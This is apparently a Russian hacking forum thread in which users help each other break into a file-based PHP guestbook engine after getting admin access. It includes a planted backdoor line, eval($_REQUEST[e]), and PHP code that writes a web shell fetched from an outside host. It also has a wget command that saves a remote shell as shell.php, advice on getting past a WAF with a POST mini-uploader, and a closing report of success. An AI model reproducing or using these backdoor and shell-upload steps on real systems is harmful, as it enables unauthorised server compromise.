|
Собственно интересует наличие уязвимостей данного движка гостевой книги.
Есть доступ в админку Движок работает только на файлах без использования внешних бд В админке можно включить html код в коментариях но толку от этого никакого Можно задать имя бд например config.php и слить дамп в формате .dat файла. но толку от этого тоже никакого т.к. из своей директории путем "../../../" выбраться нельзя. Есть загрузка дампа для востановления бд но ни шелл ни дамп не льётся на сервер. Исходники движка можно скачать тут: http://gb.lugr.ru/ Может кто нибудь подскажет как разбомбить это NoName скрипт? |
Через админку удалось записать бэкдор типа:
Код:
eval($_REQUEST[e]);далее пытаюсь залить шелл: Код:
$fh = fopen('new.php', "a+");fwrite($fh, file_get_contents('http://somesite.ru/newfile.txt'));fclose($fh);Цитата:
но никуда попасть больше не могу... Получаю Method Not Implemented Подскажите как действовать дальше? |
Вместо ls сделай "wget http://*путь до шелла в формате txt* -o shell.php"
|
Цитата:
Method Not Implemented |
это WAF? allow_url_fopen? только с GET так? какие загрузчики пробовали? может лучше сделать мини аплоадер файлов?
|
Цитата:
2.allow_url_fopen on 3.Пост запросы не пробовал 4.мини аплоадер методом POST? Если можно ссылочку для примера. |
Получилось сделать мини аплоадер с методом POST. Спасибо. Script OWNED
|
| Время: 11:36 |